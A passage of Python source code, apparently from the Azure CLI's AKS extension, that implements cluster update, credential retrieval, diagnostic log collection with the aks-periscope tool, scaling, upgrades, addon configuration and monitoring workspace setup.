_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(api_server_authorized_ip_ranges, instance)
if enable_aad:
if instance.aad_profile is not None and instance.aad_profile.managed:
raise CLIError('Cannot specify "--enable-aad" if managed AAD is already enabled')
instance.aad_profile = ManagedClusterAADProfile(
managed=True
)
if update_aad_profile:
if instance.aad_profile is None or not instance.aad_profile.managed:
raise CLIError('Cannot specify "--aad-tenant-id/--aad-admin-group-object-ids"'
' if managed AAD is not enabled')
if aad_tenant_id is not None:
instance.aad_profile.tenant_id = aad_tenant_id
if aad_admin_group_object_ids is not None:
instance.aad_profile.admin_group_object_ids = _parse_comma_separated_list(aad_admin_group_object_ids)
if enable_ahub and disable_ahub:
raise CLIError('Cannot specify "--enable-ahub" and "--disable-ahub" at the same time')
if enable_ahub:
instance.windows_profile.license_type = 'Windows_Server'
if disable_ahub:
instance.windows_profile.license_type = 'None'
if instance.auto_upgrade_profile is None:
instance.auto_upgrade_profile = ManagedClusterAutoUpgradeProfile()
if auto_upgrade_channel is not None:
instance.auto_upgrade_profile.upgrade_channel = auto_upgrade_channel
if not enable_managed_identity and assign_identity:
raise CLIError('--assign-identity can only be specified when --enable-managed-identity is specified')
current_identity_type = "spn"
if instance.identity is not None:
current_identity_type = instance.identity.type.casefold()
goal_identity_type = current_identity_type
if enable_managed_identity:
if not assign_identity:
goal_identity_type = "systemassigned"
else:
goal_identity_type = "userassigned"
if current_identity_type != goal_identity_type:
from knack.prompting import prompt_y_n
msg = ""
if current_identity_type == "spn":
msg = ('Your cluster is using service principal, and you are going to update the cluster to use {} managed identity.\n'
'After updating, your cluster\'s control plane and addon pods will switch to use managed identity, but kubelet '
'will KEEP USING SERVICE PRINCIPAL until you upgrade your agentpool.\n '
'Are you sure you want to perform this operation?').format(goal_identity_type)
else:
msg = ('Your cluster is already using {} managed identity, and you are going to update the cluster to use {} managed identity. \n'
'Are you sure you want to perform this operation?').format(current_identity_type, goal_identity_type)
if not yes and not prompt_y_n(msg, default="n"):
return None
if goal_identity_type == "systemassigned":
instance.identity = ManagedClusterIdentity(
type="SystemAssigned"
)
elif goal_identity_type == "userassigned":
user_assigned_identity = {
assign_identity: ManagedClusterIdentityUserAssignedIdentitiesValue()
}
instance.identity = ManagedClusterIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identity
)
if enable_pod_identity:
_update_addon_pod_identity(instance, enable=True)
if disable_pod_identity:
_update_addon_pod_identity(instance, enable=False)
if tags:
instance.tags = tags
headers = get_aks_custom_headers(aks_custom_headers)
monitoring_addon_enabled = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
virtual_node_addon_enabled = CONST_VIRTUAL_NODE_ADDON_NAME + 'Linux' in instance.addon_profiles and \
instance.addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + 'Linux'].enabled
return _put_managed_cluster_ensuring_permission(cmd,
client,
subscription_id,
resource_group_name,
name,
instance,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
False,
instance.agent_pool_profiles[0].vnet_subnet_id,
_is_msi_cluster(instance),
attach_acr,
headers,
no_wait)
def aks_show(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def aks_get_credentials(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
admin=False,
user='clusterUser',
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
overwrite_existing=False,
context_name=None):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(resource_group_name, name)
else:
if user.lower() == 'clusteruser':
credentialResults = client.list_cluster_user_credentials(resource_group_name, name)
elif user.lower() == 'clustermonitoringuser':
credentialResults = client.list_cluster_monitoring_user_credentials(resource_group_name, name)
else:
raise CLIError("The user is invalid.")
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8')
_print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
# pylint: disable=line-too-long
def aks_kollect(cmd, # pylint: disable=too-many-statements,too-many-locals
client,
resource_group_name,
name,
storage_account=None,
sas_token=None,
container_logs=None,
kube_objects=None,
node_logs=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
storage_account_id = None
if storage_account is None:
print("No storage account specified. Try getting storage account from diagnostic settings")
storage_account_id = get_storage_account_from_diag_settings(cmd.cli_ctx, resource_group_name, name)
if storage_account_id is None:
raise CLIError("A storage account must be specified, since there isn't one in the diagnostic settings.")
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
if storage_account_id is None:
if not is_valid_resource_id(storage_account):
storage_account_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Storage', type='storageAccounts',
name=storage_account
)
else:
storage_account_id = storage_account
if is_valid_resource_id(storage_account_id):
try:
parsed_storage_account = parse_resource_id(storage_account_id)
except CloudError as ex:
raise CLIError(ex.message)
else:
raise CLIError("Invalid storage account id %s" % storage_account_id)
storage_account_name = parsed_storage_account['name']
readonly_sas_token = None
if sas_token is None:
storage_client = cf_storage(cmd.cli_ctx, parsed_storage_account['subscription'])
storage_account_keys = storage_client.storage_accounts.list_keys(parsed_storage_account['resource_group'],
storage_account_name)
kwargs = {
'account_name': storage_account_name,
'account_key': storage_account_keys.keys[0].value
}
cloud_storage_client = cloud_storage_account_service_factory(cmd.cli_ctx, kwargs)
sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rwdlacup',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rl',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = readonly_sas_token.strip('?')
from knack.prompting import prompt_y_n
print()
print('This will deploy a daemon set to your cluster to collect logs and diagnostic information and '
f'save them to the storage account '
f'{colorama.Style.BRIGHT}{colorama.Fore.GREEN}{storage_account_name}{colorama.Style.RESET_ALL} as '
f'outlined in {format_hyperlink("http://aka.ms/AKSPeriscope")}.')
print()
print('If you share access to that storage account to Azure support, you consent to the terms outlined'
f' in {format_hyperlink("http://aka.ms/DiagConsent")}.')
print()
if not prompt_y_n('Do you confirm?', default="n"):
return
print()
print("Getting credentials for cluster %s " % name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=True, path=temp_kubeconfig_path)
print()
print("Starts collecting diag info for cluster %s " % name)
sas_token = sas_token.strip('?')
deployment_yaml = urlopen(
"https://raw.githubusercontent.com/Azure/aks-periscope/latest/deployment/aks-periscope.yaml").read().decode()
deployment_yaml = deployment_yaml.replace("# <accountName, base64 encoded>",
(base64.b64encode(bytes(storage_account_name, 'ascii'))).decode('ascii'))
deployment_yaml = deployment_yaml.replace("# <saskey, base64 encoded>",
(base64.b64encode(bytes("?" + sas_token, 'ascii'))).decode('ascii'))
yaml_lines = deployment_yaml.splitlines()
for index, line in enumerate(yaml_lines):
if "DIAGNOSTIC_CONTAINERLOGS_LIST" in line and container_logs is not None:
yaml_lines[index] = line + ' ' + container_logs
if "DIAGNOSTIC_KUBEOBJECTS_LIST" in line and kube_objects is not None:
yaml_lines[index] = line + ' ' + kube_objects
if "DIAGNOSTIC_NODELOGS_LIST" in line and node_logs is not None:
yaml_lines[index] = line + ' ' + node_logs
deployment_yaml = '\n'.join(yaml_lines)
fd, temp_yaml_path = tempfile.mkstemp()
temp_yaml_file = os.fdopen(fd, 'w+t')
try:
temp_yaml_file.write(deployment_yaml)
temp_yaml_file.flush()
temp_yaml_file.close()
try:
print()
print("Cleaning up aks-periscope resources if existing")
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"serviceaccount,configmap,daemonset,secret",
"--all", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding-view", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRole",
"aks-periscope-role", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"--all",
"apd", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.DEVNULL)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"CustomResourceDefinition",
"diagnostics.aks-periscope.azure.github.com", "--ignore-not-found"],
stderr=subprocess.STDOUT)
print()
print("Deploying aks-periscope")
subprocess.check_output(["kubectl", "--kubeconfig", temp_kubeconfig_path, "apply", "-f",
temp_yaml_path, "-n", "aks-periscope"], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
finally:
os.remove(temp_yaml_path)
print()
fqdn = mc.fqdn if mc.fqdn is not None else mc.private_fqdn
normalized_fqdn = fqdn.replace('.', '-')
token_in_storage_account_url = readonly_sas_token if readonly_sas_token is not None else sas_token
log_storage_account_url = f"https://{storage_account_name}.blob.core.windows.net/" \
f"{_trim_fqdn_name_containing_hcp(normalized_fqdn)}?{token_in_storage_account_url}"
print(f'{colorama.Fore.GREEN}Your logs are being uploaded to storage account {format_bright(storage_account_name)}')
print()
print(f'You can download Azure Stroage Explorer here '
f'{format_hyperlink("https://azure.microsoft.com/en-us/features/storage-explorer/")}'
f' to check the logs by adding the storage account using the following URL:')
print(f'{format_hyperlink(log_storage_account_url)}')
print()
if not prompt_y_n('Do you want to see analysis results now?', default="n"):
print(f"You can run 'az aks kanalyze -g {resource_group_name} -n {name}' "
f"anytime to check the analysis results.")
else:
display_diagnostics_report(temp_kubeconfig_path)
def aks_kanalyze(cmd, client, resource_group_name, name):
colorama.init()
client.get(resource_group_name, name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=True, path=temp_kubeconfig_path)
display_diagnostics_report(temp_kubeconfig_path)
def aks_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
node_count,
nodepool_name="",
no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There are more than one node pool in the cluster. '
'Please specify nodepool name or use az aks nodepool command to scale node pool')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd, # pylint: disable=unused-argument, too-many-return-statements
client,
resource_group_name,
name,
kubernetes_version='',
control_plane_only=False,
no_wait=False,
node_image_only=False,
yes=False):
from knack.prompting import prompt_y_n
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster" \
"and might take a while, do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
# This only provide convenience for customer at client side so they can run az aks upgrade to upgrade all
# nodepools of a cluster. The SDK only support upgrade single nodepool at a time.
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation '
'can only be applied on VirtualMachineScaleSets cluster.')
agent_pool_client = cf_agent_pools(cmd.cli_ctx)
_upgrade_single_nodepool_image_version(True, agent_pool_client, resource_group_name, name, agent_pool_profile.name)
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name):
return sdk_no_wait(no_wait, client.upgrade_node_image_version, resource_group_name, cluster_name, nodepool_name)
def _handle_addons_args(cmd, # pylint: disable=too-many-statements
addons_str,
subscription_id,
resource_group_name,
addon_profiles=None,
workspace_resource_id=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
aci_subnet_name=None,
vnet_subnet_id=None):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True, config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True)
addons.remove('azure-policy')
if 'gitops' in addons:
addon_profiles['gitops'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('gitops')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
if 'open-service-mesh' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
addon_profiles[CONST_OPEN_SERVICE_MESH_ADDON_NAME] = addon_profile
addons.remove('open-service-mesh')
if 'confcom' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
addons.remove('confcom')
if 'virtual-node' in addons:
if not aci_subnet_name or not vnet_subnet_id:
raise CLIError('"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
# TODO: how about aciConnectorwindows, what is its addon name?
os_type = 'Linux'
addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
enabled=True,
config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
)
addons.remove('virtual-node')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2",
"brazilsouth": "CQ",
"brazilsoutheast": "BRSE",
"norwayeast": "NOE",
"southafricanorth": "JNB",
"northcentralus": "NCUS",
"uaenorth": "DXB",
"germanywestcentral": "DEWC",
"ukwest": "WUK",
"switzerlandnorth": "CHN",
"switzerlandwest": "CHW",
"uaecentral": "AUH"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "brazilsouth",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "northcentralus",
"northeurope": "northeurope",
"southafricanorth": "southafricanorth",
"southafricawest": "southafricanorth",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "ukwest",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2",
"norwayeast": "norwayeast",
"norwaywest": "norwayeast",
"switzerlandnorth": "switzerlandnorth",
"switzerlandwest": "switzerlandwest",
"uaenorth": "uaenorth",
"germanywestcentral": "germanywestcentral",
"germanynorth": "germanywestcentral",
"uaecentral": "uaecentral",
"eastus2euap": "eastus2euap",
"brazilsoutheast": "brazilsoutheast"
}
# mapping for azure china cloud
# log analytics only support China East2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
# mapping for azure us governmner cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV",
"usgovarizona": "PHX"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia",
"usgovtexas": "usgovvirginia",
"usgovarizona": "usgovarizona"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(workspace_region, "USGV")
else:
logger.error("AKS Monitoring addon not supported in cloud : %s", cloud_name)
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})
default_workspace_params = {
'location': workspace_region,
'properties': {
'sku': {
'name': 'standalone'
}
}
}
async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
default_workspace_params)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
if not addon.enabled:
return None
# workaround for this addon key which has been seen lowercased in the wild
for key in list(addon.config):
if key.lower() == CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID.lower() and key != CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID:
addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID] = addon.config.pop(key)
workspace_resource_id = addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID].strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError('Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
store_acs_service_principal(subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError('node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
